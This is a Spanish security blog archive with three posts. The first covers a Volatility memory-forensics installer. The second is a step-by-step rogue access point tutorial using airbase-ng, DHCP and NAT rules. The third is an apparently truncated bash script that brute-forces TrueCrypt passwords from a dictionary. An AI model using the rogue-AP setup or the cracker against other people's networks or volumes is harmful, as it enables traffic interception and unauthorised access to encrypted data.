Archive

Archive for the ‘Bash Script’ Category

Volatility Installer

May 3rd, 2011 No comments

Como ya sabréis, Volatility es un producto de código abierto de “Volatile Systems” escrito en Python orientado al análisis forense de memoria RAM en entornos Windows.

Una vez instalado es muy potente y sencillo de usar, pero tienes que dedicarle un “ratito” a la instalación… Con el objetivo de hacer más sencillo el proceso de instalación ha nacido un proyecto en Google Code de la mano de Juan Garrido llamado Volatility Installer, en el que he tenido la suerte de participar en la versión UNIX del script.

El proceso de instalación sería el siguiente:

[[email protected] ~]$ uname -a
FreeBSD hellforce1.hell.lan 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Feb 18 02:24:46 UTC 2011     [email protected]:/usr/obj/usr/src/sys/GENERIC  i386
[[email protected] ~]$ wget http://volatility-installer.googlecode.com/files/install.volatility.tar.gz
--2011-05-03 01:42:29--  http://volatility-installer.googlecode.com/files/install.volatility.tar.gz
Resolviendo volatility-installer.googlecode.com (volatility-installer.googlecode.com)... 209.85.147.82
Connecting to volatility-installer.googlecode.com (volatility-installer.googlecode.com)|209.85.147.82|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 8935 (8,7K) [application/x-gzip]
Saving to: `install.volatility.tar.gz'

100%[===================================================================================================================================================================================================>] 8.935       --.-K/s   in 0s      

2011-05-03 01:42:29 (54,8 MB/s) - `install.volatility.tar.gz' saved [8935/8935]

[[email protected] ~]$ sha1 install.volatility.tar.gz | grep 51f4505f2ed2d53a724cfe4761fa7d45818fbcc4
SHA1 (install.volatility.tar.gz) = 51f4505f2ed2d53a724cfe4761fa7d45818fbcc4
[[email protected] ~]$ tar xf install.volatility.tar.gz
[[email protected] ~]$ cd install.volatility
[[email protected] ~/install.volatility]$ ./volatility.installer.sh 

##################################################
#     Volatility Installer UNIX Script v0.3b     #
# http://code.google.com/p/volatility-installer/ #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Project leader: Juan Garrido (aka Silverhack)  #
# Script written by: Chema Garcia (aka sch3m4)   #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Contact:                                       #
#           http://safetybits.net                    #
#           [email protected] #
#           [email protected] #
##################################################

Usage: ./volatility.installer.sh <options>

+ Options:
 -v -------> Install Volatility
 -p -------> Install plugins
 -r -------> Install PyCrypto
 -y -------> Install libyara
 -t -------> Install yara-python
 -d -------> Install Distorm
 -s -------> Install libdasm
 -f -------> Install pefile
 -A -------> * Install all above

[[email protected] ~/install.volatility]$ ./volatility-installer -A

##################################################
#     Volatility Installer UNIX Script v0.3b     #
# http://code.google.com/p/volatility-installer/ #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Project leader: Juan Garrido (aka Silverhack)  #
# Script written by: Chema Garcia (aka sch3m4)   #
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
# Contact:                                       #
#           http://safetybits.net                    #
#           [email protected] #
#           [email protected] #
##################################################

[i] Installing: Volatility
 + Url: https://www.volatilesystems.com/volatility/1.3/Volatility-1.3_Beta.tar.gz
 + File: volatility.tar.gz
 + Folder: Volatility-1.3_Beta
 + MD5: 77d05a5e93ea77425379a306024b739b
 + SHA256: 7d4dd429a488671c559c6f5de0d3fae6d3d1f9eb67c19e399495a1b6aa31d392\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting Volatility...
 OK
 - Installing...
Password:
 OK
 - Cleaning...
 OK

[i] Installing: PyCrypto
 + Url: http://www.amk.ca/files/python/crypto/pycrypto-2.0.1.tar.gz
 + File: pycrypto-2.0.1.tar.gz
 + Folder: pycrypto-2.0.1
 + MD5: 4d5674f3898a573691ffb335e8d749cd
 + SHA256: b08d4ed54c9403c77778a3803e53a4f33f359b42d94f6f3e14abb1bf4941e6ea\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting PyCrypto...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing: LibDASM
 + Url: http://www.klake.org/~jt/misc/libdasm-1.5.tar.gz
 + File: libdasm-1.5.tar.gz
 + Folder: libdasm-1.5
 + MD5: f166d83ba73ae7f7f260366ba7155787
 + SHA256: 34d6c17dbb318bf2e21c6a3ae7dcc53d918ce247f1bd422b123d5e41a730a676\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting LibDASM...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing: Distorm3
 + Url: http://distorm.googlecode.com/files/distorm3.zip
 + File: distorm3.zip
 + Folder: distorm3
 + MD5: eb80e8901d4c52965b0de9ea5b7dca91
 + SHA256: 4fba8606caab377d10646953a205507a1faa184047f869cc13e62b1ebf4a1b0e\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting Distorm3...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing: Yara
 + Url: http://yara-project.googlecode.com/files/yara-1.4.tar.gz
 + File: yara-1.4.tar.gz
 + Folder: yara-1.4
 + MD5: ecc744a67482dc9d717936ccd69dc39f
 + SHA256: c040cc139030e49f736200d3a951922d417fc660cf4c81484ff1ca1a06f83952\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting Yara...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing: Yara-Python
 + Url: http://yara-project.googlecode.com/files/yara-python-1.4a.tar.gz
 + File: yara-python-1.4a.tar.gz
 + Folder: yara-python-1.4a
 + MD5: 0754dcc834c7f69ed0382d895d9a10cc
 + SHA256: 0221b6b5178edc99584fb0e082ebbc454e3e33701112f7041349e547a8aabc66\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting Yara-Python...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing: PEFile
 + Url: http://pefile.googlecode.com/files/pefile-1.2.10-102.tar.gz
 + File: pefile-1.2.10-102.tar.gz
 + Folder: pefile-1.2.10-102
 + MD5: 0047429fbd7b8bad8f5c583291b598f9
 + SHA256: 29d8b6fb4d30b1b45b801526591e8f23fb539cc059ed79d5aa34be93a9734dfe\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Extracting PEFile...
 OK
 - Installing...
 OK
 - Cleaning...
 OK

[i] Installing plugin: DriverIRP
 + Url: http://mhl-malware-scripts.googlecode.com/files/driverirp.py
 + File: driverirp.py
 + Folder: memory_plugins
 + MD5: 0696eefa51362b71606337b8d04d886f
 + SHA256: 7edf7373260462b36ac985837f28c27623e229291d7a1550334fcb2f667fc0fc\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing DriverIRP...
 OK
 - Cleaning...
 OK

[i] Installing plugin: GetSIDs
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/getsids.py
 + File: getsids.py
 + Folder: memory_plugins
 + MD5: 49353f0a48a1f9b2411439fb8a0973dc
 + SHA256: a403bfbb98d49d9a73cc0f9928994f5ed3bcbf9ef249627e1bb0b86f2c24e41b\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing GetSIDs...
 OK
 - Cleaning...
 OK

[i] Installing plugin: SSDT
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/ssdt.py
 + File: ssdt.py
 + Folder: memory_plugins
 + MD5: c820f40174bd42e77608d0415ed021c6
 + SHA256: 5760e5fba87b5fb536c0ad80ec6621bd43fa28ded8b75055380a6ac83db7f187\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing SSDT...
 OK
 - Cleaning...
 OK

[i] Installing plugin: ModDump
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/moddump.py
 + File: moddump.py
 + Folder: memory_plugins
 + MD5: a6a98d106793bf674d8276a7ca127f4c
 + SHA256: 93771efe555c99d720371a5f6556aa9c734a49d514e782e0d3ceaf097019e522\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing ModDump...
 OK
 - Cleaning...
 OK

[i] Installing plugin: VolShell
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/volshell.py
 + File: volshell.py
 + Folder: memory_plugins
 + MD5: 0012136fdef54c479eec44b7f19b5bcc
 + SHA256: e0b0b23eb00bf25b160399916004afe34da1c8ae3ebb870e901d09147f310962\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing VolShell...
 OK
 - Cleaning...
 OK

[i] Installing plugin: MalFind2
 + Url: http://mhl-malware-scripts.googlecode.com/files/malfind2.py
 + File: malfind2.py
 + Folder: memory_plugins
 + MD5: b9212ae50a800ffabfa5889bb7e3766b
 + SHA256: 8ad794435ad7a3cda7e3ec12525c781b14f5f09d6e37ffc39e5923ac07c304ec\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing MalFind2...
 OK
 - Cleaning...
 OK

[i] Installing plugin: CryptoScan
 + Url: http://jessekornblum.com/tools/volatility/cryptoscan.py
 + File: cryptoscan.py
 + Folder: memory_plugins
 + MD5: 523f67f6c19fa5637c35accef492a04b
 + SHA256: c6d97346eefe7c27cda73ed711ea3225d509c5162ae346f8fa66c6159898c9c6\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing CryptoScan...
 OK
 - Cleaning...
 OK

[i] Installing plugin: Suspicious
 + Url: http://jessekornblum.com/tools/volatility/suspicious.py
 + File: suspicious.py
 + Folder: memory_plugins
 + MD5: d751b34f2ef1713a5f599ea7fae20c1b
 + SHA256: 7941afa01e6de182c8e7452a23908be86702fa9b691dea0d56ff0a6d2bcdda43\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing Suspicious...
 OK
 - Cleaning...
 OK

[i] Installing plugin: PsTree
 + Url: http://www.pyflag.net/volatility/pstree.py
 + File: pstree.py
 + Folder: memory_plugins
 + MD5: cabf40d8fc1fc52e1a89930dec1ccec9
 + SHA256: ef2f719a3213c6e637735ad9a4a6bd04e922fa177d7c8651f4d8bd75c8cfa2c9\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing PsTree...
 OK
 - Cleaning...
 OK

[i] Installing plugin: KeyboardBuffer
 + Url: http://computer.forensikblog.de/files/volatility_plugins/keyboardbuffer.py
 + File: keyboardbuffer.py
 + Folder: memory_plugins
 + MD5: fda30c99dc701dce7a039d3de19307a3
 + SHA256: 396e72ddbda2846b301fb97b5ccf06bd250bf81a7327e514e4821ca637d6e088\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing KeyboardBuffer...
 OK
 - Cleaning...
 OK

[i] Installing plugin: OrphanThreads
 + Url: http://mhl-malware-scripts.googlecode.com/files/orphan_threads.py
 + File: orphan_threads.py
 + Folder: memory_plugins
 + MD5: 82ad2b8b5dde35f68f9ac3e9687655d6
 + SHA256: 009239a031cd53a82378a815ce81803ad3b7d4e8bd6257f34e50a5833cc0bda9\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing OrphanThreads...
 OK
 - Cleaning...
 OK

[i] Installing plugin: UsermodeHooks
 + Url: http://mhl-malware-scripts.googlecode.com/files/usermode_hooks2.py
 + File: usermode_hooks2.py
 + Folder: memory_plugins
 + MD5: 253a6885e52e39002c770e77916e7e09
 + SHA256: fae684cb49922dbf0c7920c4195876805ed591887e1b34dd590472a2a5a55de1\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing UsermodeHooks...
 OK
 - Cleaning...
 OK

[i] Installing plugin: KernelHooks
 + Url: http://mhl-malware-scripts.googlecode.com/files/kernel_hooks.py
 + File: kernel_hooks.py
 + Folder: memory_plugins
 + MD5: 01dcde71e2878b8c04cace8acd4bd06c
 + SHA256: 5911d54bb2e4802feb9cc5915dbabde395a89cbf1fd0217626112646da04e055\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing KernelHooks...
 OK
 - Cleaning...
 OK

[i] Installing plugin: IDT
 + Url: http://mhl-malware-scripts.googlecode.com/files/idt.py
 + File: idt.py
 + Folder: memory_plugins
 + MD5: 1890882ec273bf0036e9fb1aa4ea17e5
 + SHA256: 4ea358826d4f284f8f669a7bbddf4a6048c0fe3e83f98f973525cd1172d28b35\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing IDT...
 OK
 - Cleaning...
 OK

[i] Installing plugin: Lists
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/lists.py
 + File: lists.py
 + Folder: forensics/win32
 + MD5: 7d7e7cd7b9d8f12773c057b402f79650
 + SHA256: 793b9a77a6b04c941c870cb4d22f3d8a9447a0431aaa954da04b4fcdee5dc140\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing Lists...
 OK
 - Cleaning...
 OK

[i] Installing plugin: ThreadQueues
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/threadqueues.py
 + File: threadqueues.py
 + Folder: forensics/win32
 + MD5: 1dc40cd5987dfd55f4146721d978416f
 + SHA256: 4e370bfb29f673373ea1cc36991b42457894d12a1eb8df720e8ef040484d9d0e\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing ThreadQueues...
 OK
 - Cleaning...
 OK

[i] Installing plugin: VolRIP
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/volrip-0.1.zip
 + File: volrip-0.1.zip
 + Folder: ./
 + MD5: 96b15dc1bcd1bd1f2782d38645dc5af9
 + SHA256: dc1b6bd109e813c3bd831c53955ae1401e181221ce3ffcfacc4fffb3b964b820\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing VolRIP...
 OK
 - Cleaning...
 OK

[i] Installing plugin: VolREG
 + Url: http://www.cc.gatech.edu/~brendan/volatility/dl/volreg-0.6.zip
 + File: volreg-0.6.zip
 + Folder: ./
 + MD5: 75d5e4f686082799d961641ebcd17bbd
 + SHA256: b361f0d516baf5e60c1048b5416a899365ac1824631390a962d5d258c10585b4\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing VolREG...
 OK
 - Cleaning...
 OK

[i] Installing plugin: FileObjScan
 + Url: http://computer.forensikblog.de/files/volatility_plugins/volatility_fileobjscan-current.zip
 + File: volatility_fileobjscan-current.zip
 + Folder: ./
 + MD5: 11a0a12f5d6ed31872daa6660446eb1c
 + SHA256: d8963851b4286b7fda5e9902ab176c49e1afb107dac8629046db6dfaedfc3653\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing FileObjScan...
 OK
 - Cleaning...
 OK

[i] Installing plugin: SymLinkScan
 + Url: http://computer.forensikblog.de/files/volatility_plugins/volatility_symlinkobjscan-current.zip
 + File: volatility_symlinkobjscan-current.zip
 + Folder: ./
 + MD5: e62dac146336e6f79ca89ca07061730c
 + SHA256: 7215b1977d7a6e9bfc44056c1becf41a7dc230a8ef14df5d260026fb5e600518\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing SymLinkScan...
 OK
 - Cleaning...
 OK

[i] Installing plugin: MutantScan
 + Url: http://computer.forensikblog.de/files/volatility_plugins/volatility_mutantscan-current.zip
 + File: volatility_mutantscan-current.zip
 + Folder: ./
 + MD5: c0571785cdea36f40416594b6e6134e4
 + SHA256: 080a8aa43cbd445c716c1b46a9c97c326d92bf8c3953eadea65cd9b7e677285e\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing MutantScan...
 OK
 - Cleaning...
 OK

[i] Installing plugin: ObjTypeScan
 + Url: http://computer.forensikblog.de/files/volatility_plugins/volatility_objtypescan-current.zip
 + File: volatility_objtypescan-current.zip
 + Folder: ./
 + MD5: 6ae2673cdaf7a0f2249db6f9dcc4b0a3
 + SHA256: 00b5b98bc2d6449a2106d42f208176360488d0da2b203c14c4c6ad66ef3e46a0\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing ObjTypeScan...
 OK
 - Cleaning...
 OK

[i] Installing plugin: DriverScan
 + Url: http://computer.forensikblog.de/files/volatility_plugins/volatility_driverscan-current.zip
 + File: volatility_driverscan-current.zip
 + Folder: ./
 + MD5: 02da6e69c983a9c2d5f5334da60f9d68
 + SHA256: 4384bbf66af9169986bacca75fbaf75d15c7006f4250b187f9b7ef94ebcad095\n

 - Downloading...
 OK
 - Verifing checksums...
 OK
 - Installing DriverScan...
 OK
 - Cleaning...
 OK

[+] Finished! You can check installation logs in /usr/home/sch3m4/install.volatility/logs_martes.05-03-11.01-40-33
[[email protected] ~/install.volatility]$

Hecho esto se habrá creado el script /usr/bin/volatility con el que podemos invocar a volatility desde cualquier directorio:

[[email protected] /tmp]$ volatility 

 Volatile Systems Volatility Framework v1.3
 Copyright (C) 2007,2008 Volatile Systems
 Copyright (C) 2007 Komoku, Inc.
 This is free software; see the source for copying conditions.
 There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

 usage: volatility cmd [cmd_opts]

 Run command cmd with options cmd_opts
 For help on a specific command, run 'volatility cmd --help'

 Supported Internel Commands:
 connections        Print list of open connections
 connscan           Scan for connection objects
 connscan2          Scan for connection objects (New)
 datetime           Get date/time information for image
 dlllist            Print list of loaded dlls for each process
 dmp2raw            Convert a crash dump to a raw dump
 dmpchk             Dump crash dump information
 files              Print list of open files for each process
 hibinfo            Convert hibernation file to linear raw image
 ident              Identify image properties
 memdmp             Dump the addressable memory for a process
 memmap             Print the memory map
 modscan            Scan for modules
 modscan2           Scan for module objects (New)
 modules            Print list of loaded modules
 procdump           Dump a process to an executable sample
 pslist             Print list of running processes
 psscan             Scan for EPROCESS objects
 psscan2            Scan for process objects (New)
 raw2dmp            Convert a raw dump to a crash dump
 regobjkeys         Print list of open regkeys for each process
 sockets            Print list of open sockets
 sockscan           Scan for socket objects
 sockscan2          Scan for socket objects (New)
 strings            Match physical offsets to virtual addresses (may take a while, VERY verbose)
 thrdscan           Scan for ETHREAD objects
 thrdscan2          Scan for thread objects (New)
 vaddump            Dump the Vad sections to files
 vadinfo            Dump the VAD info
 vadwalk            Walk the vad tree

 Supported Plugin Commands:
 cachedump          Dump (decrypted) domain hashes from the registry
 cryptoscan         Find TrueCrypt passphrases
 driverirp          Print driver IRP function addresses
 driverscan         Scan for driver objects
 fileobjscan        Scan for file objects
 getsids            Print the SIDs owning each process
 hashdump           Dump (decrypted) LM and NT hashes from the registry
 hivedump           Dump registry hives to CSV
 hivelist           Print list of registry hives
 hivescan           Scan for _CMHIVE objects (registry hives)
 idt                Print Interrupt Descriptor Table (IDT) entries
 kernel_hooks       Locate IAT/EAT/in-line API hooks in kernel space
 keyboardbuffer     Print BIOS keyboard buffer
 lsadump            Dump (decrypted) LSA secrets from the registry
 malfind2           Detect hidden and injected code
 moddump            Dump loaded kernel modules to disk.
 mutantscan         Scan for mutant (mutex) objects
 objtypescan        Scan for object type objects
 orphan_threads     Find kernel threads that don't map back to loaded modules
 printkey           Print a registry key, and its subkeys and values
 pstree            
 ssdt               Display SSDT entries
 suspicious         Find suspicious command lines and display them
 symlinkobjscan     Scan for symbolic link objects
 usermode_hooks     Locate IAT/EAT/in-line API hooks in user space
 volshell           Shell in the memory image

 Example: volatility pslist -f /path/to/my/file
[[email protected] /tmp]$

El archivo res.conf es el fichero del que lee los datos de las dependencias y plugins el script de instalación, por lo que para cambiar una versión por otra y/o agregar o eliminar plugins basta con editar este archivo.

Más información en el blog de Juan Garrido.

HowTo: Rogue AP

March 30th, 2011 No comments

Con este post pretendo despejar posibles dudas que han podido surgir tras leer los artículos anteriores sobre cómo montar un punto de acceso falso (Rogue AP) sobre DNS , DHCP, etc.

Para comenzar, necesitaremos una interface en modo monitor así que la creamos con airmon-ng o con iw, como más os guste (aunque viene a ser lo mismo).

[email protected]:~$ cd /tmp/
[email protected]:/tmp$ wget -c 'http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2'
--2011-03-29 22:00:58--  http://wireless.kernel.org/download/iw/iw-0.9.22.tar.bz2
Resolviendo wireless.kernel.org... 78.46.109.217
Connecting to wireless.kernel.org|78.46.109.217|:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 50526 (49K) [application/octet-stream]
Saving to: `iw-0.9.22.tar.bz2'

100%[===================================================================================================================================================================================================>] 50.526       233K/s   in 0,2s

2011-03-29 22:00:59 (233 KB/s) - `iw-0.9.22.tar.bz2' saved [50526/50526]

[email protected]:/tmp$ tar xf iw-0.9.22.tar.bz2
[email protected]:/tmp$ cd iw-0.9.22/
[email protected]:/tmp/iw-0.9.22$ make clean && make
CC   iw.o
CC   genl.o
CC   event.o
CC   info.o
CC   phy.o
CC   interface.o
CC   ibss.o
CC   station.o
CC   survey.o
CC   util.o
CC   mesh.o
CC   mpath.o
CC   scan.o
CC   reg.o
GEN  version.c
CC   version.o
CC   reason.o
CC   status.o
CC   connect.o
CC   link.o
CC   offch.o
CC   ps.o
CC   cqm.o
CC   bitrate.o
CC   sections.o
CC   iw
[email protected]:/tmp/iw-0.9.22$ sudo make install
GZIP iw.8
INST iw
INST iw.8
[email protected]:/tmp/iw-0.9.22$

Ahora vamos a instalar el servidor DHCP y realizaremos una configuración básica, con esto conseguiremos que los clientes obtengan los datos de red de forma automática al realizar una petición DHCP.

Para no complicarnos y dado que todo esto lo estoy realizando sobre Debian, instalaremos el servidor DHCP desde los repositorios, instala el que más te guste, en mi caso tengo instalado “isc-dhcp-server“:

[email protected]:/tmp/iw-0.9.22$ apt-cache search dhcp | grep -i server
bootp - server for the bootp protocol with DHCP support
udhcpd - Provides the busybox DHCP server implementation
dhcp-probe - network DHCP or BootP server discover
dhis-server - Dynamic Host Information System - server
dnsmasq-base - A small caching DNS proxy and DHCP/TFTP server
dnsmasq - A small caching DNS proxy and DHCP/TFTP server
gadmintools - GTK+ server administration tools (meta-package)
dhcp3-server - ISC DHCP server (transitional package)
isc-dhcp-server-dbg - ISC DHCP server for automatic IP address assignment (debug)
isc-dhcp-server-ldap - DHCP server able to use LDAP as backend
isc-dhcp-server - ISC DHCP server for automatic IP address assignment
ltsp-server-standalone - complete LTSP server environment
python-pydhcplib - Python DHCP client/server library
resolvconf - name server information handler
wide-dhcpv6-server - DHCPv6 server for automatic IPv6 hosts configuration
dibbler-server - Servidor de DHCPv6 adaptable
[email protected]:/tmp/iw-0.9.22$

Una vez instalado, si solo queremos usarlo para casos puntuales y evitar que esté siempre corriendo:

[email protected]:/tmp/iw-0.9.22$ sudo update-rc.d -f isc-dhcp-server remove

La configuración que vamos a usar para el DHCP es la siguiente:

ddns-update-style none;
ignore client-updates; # ignoramos peticiones de actualizacion DDNS de los clientes
authoritative; # servidor maestro de dhcp
default-lease-time 86400; # 24 horas (tiempo de "vida" de la IP asignada al cliente)
max-lease-time 172800; # 48 horas (tiempo de "vida" maximo de la IP asignada al cliente)

subnet 192.168.3.0 netmask 255.255.255.0
{
option routers 192.168.3.1; # router de la red
option broadcast-address 192.168.3.255; # direccion broadcast
option domain-name-servers 80.58.61.250,80.58.61.254; # DNS para los clientes
range 192.168.3.33 192.168.3.254; # rango de IPs permitidas
allow unknown-clients; # no filtramos clientes asi que no seria necesario, pero asi no se olvida
}

Esta es la configuración mínima recomendable que debemos tener para poder ofrecer DHCP a los clientes, podríamos crear diferentes “pools” con otros servidores DNS, filtrar por dirección MAC, fabricante, y un largo etcétera que no nos es vital para la ocasión, el que quiera ampliar un poco más: http://www.isc.org/software/dhcp/documentation

Ahora crearemos la interface en modo monitor para ofrecer el AP:

[email protected]:/tmp/iw-0.9.22$ sudo iw dev wlan0 interface add wifi0 type monitor

wlan0 es el nombre de la interface sobre la que vamos a crear la interface virtual wifi0 en modo monitor.

[email protected]:/tmp/iw-0.9.22$ sudo iwconfig wifi0
wifi0     IEEE 802.11bg  Mode:Monitor  Frequency:2.462 GHz  Tx-Power=15 dBm
Retry  long limit:7   RTS thr:off   Fragment thr:off
Power Management:off

[email protected]:/tmp/iw-0.9.22$

Hecho esto, lanzamos airbase-ng para anunciar nuestro AP:

[email protected]:/tmp/iw-0.9.22$ sudo airbase-ng -w abcdef0123 -y -I 50 wifi0 --essid SafetyBits
22:46:14  Created tap interface at0
22:46:14  Trying to set MTU on at0 to 1500
22:46:14  Trying to set MTU on wifi0 to 1800
22:46:14  Access Point with BSSID 00:80:5A:4D:9B:10 started.

Con lo cual, solo creamos un AP con essid “SafetyBits“, con clave WEPabcdef0123“, a través de la interface wifi0 y mediante la opción “-y” le indicamos que no responda a “broadcast probes” y con “-I” le indicamos el intervalo de tiempo en milisegundos para enviar los beacons.

En este caso no he especificado el canal, ya que al estar operando sobre wlan0 que está conectada a otra red, el canal ya está establecido.

Ahora desde otro terminal ejecutamos:

[email protected]:~$ sudo ifconfig at0 192.168.3.1 netmask 255.255.255.0 up
[email protected]:~$ sudo dhcpd at0

En el último comando no le especifico la ruta al fichero de configuración “dhcpd.conf” porque se encuentra en la ruta por defecto (“/etc/dhcp/dhcpd.conf“).

A continuación, vamos a configurar iptables con una política por defecto DROP en INPUT/OUTPUT/FORWARD para que se vea más claro cómo tenemos que gestionar el tráfico:

#!/bin/bash

AP_RED='192.168.3.0/24'
AP_IFACE='at0'
INET_IFACE='wlan0'

#Limpiamos las reglas previas
iptables -F
iptables -X
iptables -Z
iptables -t nat -F

#Politica para denegar todo por defecto
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

# Permitimos todo en local
iptables -A INPUT -i lo -d $LOOP -j ACCEPT
iptables -A OUTPUT -o lo -s $LOOP -j ACCEPT

# Permitimos todo en at0
iptables -A INPUT -i $AP_IFACE -j ACCEPT
iptables -A OUTPUT -o $AP_IFACE -j ACCEPT

# Permitimos forwarding en la subred del AP
iptables -A FORWARD -s $AP_RED -i $AP_IFACE -o $INET_IFACE -j ACCEPT
iptables -A FORWARD -d $AP_RED -o $AP_IFACE -i $INET_IFACE -j ACCEPT

# Enmascaramos la subred del AP con la interface conectada a internet
iptables -t nat -A POSTROUTING -s $AP_RED -o $INET_IFACE -j MASQUERADE

# Como por defecto hacemos DROP, permitimos todo en $INET_IFACE
iptables -A INPUT -i $INET_IFACE -j ACCEPT
iptables -A OUTPUT -o $INET_IFACE -j ACCEPT

unset AP_RED AP_IFACE INET_IFACE

exit 0

Este listado de reglas pisarán a las que se tengan previamente, así que si tienes alguna regla en el equipo debes modificar el listado anterior e integrarlas con las que tengas, y cuidado con el orden en que se establecen, que no es lo mismo “meter a tu novia en un barco” que “meter un barco en tu novia” :-p

Siguiendo con la línea, que no se olvide activar el forwarding:

sudo sysctl -w net.ipv4.ip_forward=1

Antes indicamos cómo evitar que el servidor DHCP se iniciase en cada inicio del sistema, pero si por el contrario esto es lo que queremos, debemos agregar las interfaces en las que se deben escuchar las peticiones en “/etc/default/isc-dhcp-server” y configurar manualmente los datos de la interface en “/etc/network/interfaces“.

Y eso es todo, las peticiones DNS de los clientes serán enviadas a los servidores que hemos espeficicado en el archivo “dhcpd.conf“.

Otros links:

Crackeando volúmenes de TrueCrypt

December 20th, 2009 1 comment

TrueCrypt como ya sabrán, es una aplicación que permite crear volúmenes virtuales cifrados y ocultos en otros volúmenes.

Y es que todo eso de cifrar y ocultar la información que bajo nuestro punto de vista puede ser sensible, de manera que solo nosotros sabemos cómo acceder a dichos datos está muy bien, y sí que es cierto que se nos da el caso de que realmente hay que proteger cierta información (una buena combinación es TrueCrypt + PGP), pero tarde o temprano es intevitable terminar como la siguiente ilustración, y que el botón “Forgot your password?” se convierta en nuestro mejor aliado:

En el caso del botón, todo está solucionado, rellenamos un formulario y listo (si nos acordamos de los datos del registro, claro), pero en el caso de TrueCrypt… ¿Dónde está el botón? Personalmente soy muy dado a olvidar las claves así que suelo tener varias copias de seguridad de un fichero con todas mis credenciales cifrado con PGP, pero como siempre hay algo que puede fallar, y fallará, el problema era que en ese archivo, no estaban todas las claves.

Así que necesitaba acceder a un volumen cifrado con TrueCrypt, por lo que me puse a buscar herramientas para automatizar el crackeo, y solo me encuentro con aplicaciones de pago, porciones de código y alguna que otra aplicación que dice  funcionar pero de fuentes nada fiables. Así que me dispuse a aplicar la filosofía del DIY (o para los menos avispados, Do It Yourself) e hice el script para crackear el volumen. Pero claro, como siempre el problema de los ataques por diccionario es el propio diccionario, ya que la clave rondaba los 100 caracteres, así que generé un diccionario a partir de los caracteres que recordaba, y pude acceder a los datos.

El script es muy simple, se limita a leer las posibles claves del diccionario y lanza directamente el TrueCrypt para tratar de montar el volumen usando dicha clave. Obviamente no es para nada eficiente, y si no conocemos ningún patrón de la clave, no es factible el ataque cuando uno ve datos como este:

# time truecrypt –text –non-interactive –mount –mount-options=ro  –filesystem=none -p “laclave” ./volumen
Error: Incorrect password or not a TrueCrypt volume.

real    0m2.078s
user    0m0.144s
sys     0m0.008s

Aunque ya que el código de TrueCrypt lo podemos descargar de la página oficial, se podría modificar para que el ataque fuese más eficiente.

#!/bin/bash
#

echo -e "\n"
echo -e "############################"
echo -e "#                          #"
echo -e "#        ~ SafetyBits ~       #"
echo -e "#                          #"
echo -e "# Simple TrueCrypt Cracker #"
echo -e "#          v0.1b           #"
echo -e "#                          #"
echo -e "# ~~~~~~~~~~~~~~~~~~~~~~~  #"
echo -e "#                          #"
echo -e "# Written by: Chema Garcia #"
echo -e "#        [email protected] #"
echo -e "#        http://safetybits.net #"
echo -e "#                          #"
echo -e "############################"

if [ ! $# -eq 2 ]
then
 echo -e "\nUse: $0 <volume_path> <dictionary>\n"
 exit 0
fi

TRUECRYPT="`which truecrypt`"
if [ `echo $TRUECRYPT | grep -c "^/"` -eq 0 ]
then
 echo -e "\n[!] 'truecrypt' not found!\n"
 exit 1
fi

IFSaux="$IFS"
IFS="
"

echo -e "\n[+] Started!\n"
for i in `cat $2`
do
 RES="`$TRUECRYPT --text --non-interactive --mount --mount-options=ro --filesystem=none -p "$i" "$1" 2>&1`"

 if [ $? -eq 0 ]
